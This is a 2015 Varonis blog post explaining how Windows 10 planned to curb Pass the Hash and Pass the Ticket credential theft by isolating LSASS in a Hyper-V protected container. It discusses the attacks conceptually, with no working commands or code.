Varonis announces strategic partnership with Microsoft to accelerate the secure adoption of Copilot.

Learn more

Windows 10’s Security Reboot, Part I: Authentication

There’s incredible excitement about the Windows 10 release. If you completely quantum leap over Windows 9, you’d expect big things. In December, I was talking with NYU-Poly’s Professor Justin Cappos....
Michael Buckbee
2 min read
Published February 26, 2015
Last updated October 21, 2021

There’s incredible excitement about the Windows 10 release. If you completely quantum leap over Windows 9, you’d expect big things. In December, I was talking with NYU-Poly’s Professor Justin Cappos. He’s a security expert and had nothing but high praise for Microsoft’s security group. But he added their cutting-edge research doesn’t necessarily make it into their products.

With Windows 10 officially launched in January, it looks like the security researchers have finally gotten their way.

Hate computers professionally? Try Cards Against IT.

The End of Pass the Ticket and Pass the Hash?

While Cortana and HoloLens may have stolen the show at the launch event, the other exciting news–at least for us security geeks –is that Microsoft is planning a complete revamp of its rusting security infrastructure.

Jim Alkove, the Windows 10 product manager, gave us all a heads-up about what to expect in a post  he published back in October. That was also about the time that Microsoft released the Windows 10 Technical Preview, which you’re free to download and try out on a spare PC or in a virtual machine (VM).

In my next few posts, I’ll take up some of the major changes in authentication and data security that are currently slated. The caveat is that none of this is completely finalized. The official release of Windows 10 is year away.

In any case, Alkove says that Windows 10 “aims to eliminate” — long pause — Pass the Hash and Pass the Ticket.

Loyal Metadata Era readers know that we’ve dived somewhat deep into the PtH and PtT waters.  And we’ve also written an ebook covering these two hash stealing approaches as well as other attacks used against Microsoft’s NTLM authentication protocol.

For those just tuning in, the key point is that both Windows and Linux never store plain-text passwords. That’s just Security 101. Instead they perform a one-way encryption of the password, known as a hash, and keep that instead. By all means, read Rob’s hashing post.

Unfortunately, in Windows, the password hash is equivalent to the password in terms of the power it gives you—the fancy crypto-speak for this is plain-text equivalent. In other words, hackers who are able to get inside a Windows system—and that’s easily accomplished through phishing—just need to collect password hashes to masquerade as other users.

Where do they find these hashes? Windows keeps them around in the Local Security Authority Subsystem Service (LSASS). Essentially, they’re stored in memory on a user’s laptop or desktop device.

Containers Are the Answer

Having these powerful password hashes on users’ machines instead of storing them in a safe central location is a feature (not a bug) of Single Sign On (SS0). With SSO enabled in most organizations, Windows can reuse the password hash in LSASS—remember, it’s equivalent to the password—without inconveniencing the user.

Hackers have been very effective at exploiting this feature of SSO. Using malware such as mimikatz, they’re able to easily scoop up the hashes from memory, effectively stealing user credentials without having to know the password itself.

With Window 10, though, Microsoft hopes to stomp out these tools by placing the hashes in a walled off part of memory–technically they’ll put the LSASS in its own VM.

Microsoft, of course, has developed a VM technology, known as Hyper V, and in this latest Windows version, it looks like they plan to take more advantage of it.

It’s way too early to say whether this approach will succeed in blocking Pass the Hash and Pass the Ticket—the devil is always in the implementation details.

We’ll continue with our overview of Windows 10 security in our next post, where we will take up other authentication changes. This includes multi-factor authentication, tighter integration with enterprise PKI, and we’ll learn about FIDO and security ecosystems.

What you should do now

Below are three ways we can help you begin your journey to reducing data risk at your company:

  1. Schedule a demo session with us, where we can show you around, answer your questions, and help you see if Varonis is right for you.
  2. Download our free report and learn the risks associated with SaaS data exposure.
  3. Share this blog post with someone you know who'd enjoy reading it. Share it with them via email, LinkedIn, Reddit, or Facebook.

Try Varonis free.

Get a detailed data risk report based on your company’s data.
Deploys in minutes.

Keep reading

Varonis tackles hundreds of use cases, making it the ultimate platform to stop data breaches and ensure compliance.

windows-bluekeep-vulnerability:-deja-vu-again-with-rdp-security-weaknesses
Windows BlueKeep Vulnerability: Deja Vu Again With RDP Security Weaknesses
It’s a familiar data security story: under-patched Windows software, hidden security vulnerabilities, and hackers who know how to exploit them. But if the patch involves Windows Remote Desk Protocol (RDP),...
working-with-windows-local-administrator-accounts,-part-i
Working With Windows Local Administrator Accounts, Part I
In writing about hackers and their techniques, the issue of Windows local Administrator accounts often comes up. Prior to Windows 7, the Administrator account was created by default with no...
what-about-individual-users-on-acl's?
What About Individual Users on ACL's?
One question I received in response to our recent post about aligning windows security groups and automating entitlement reviews was, “If you’re using single-purpose security groups and managing them automatically...
windows-defender-turned-off-by-group-policy-[solved]
Windows Defender Turned Off by Group Policy [Solved]
Windows Defender is a common AV solution, and attackers know how to work-around it. Learn how to turn Defender back on with this easy tutorial.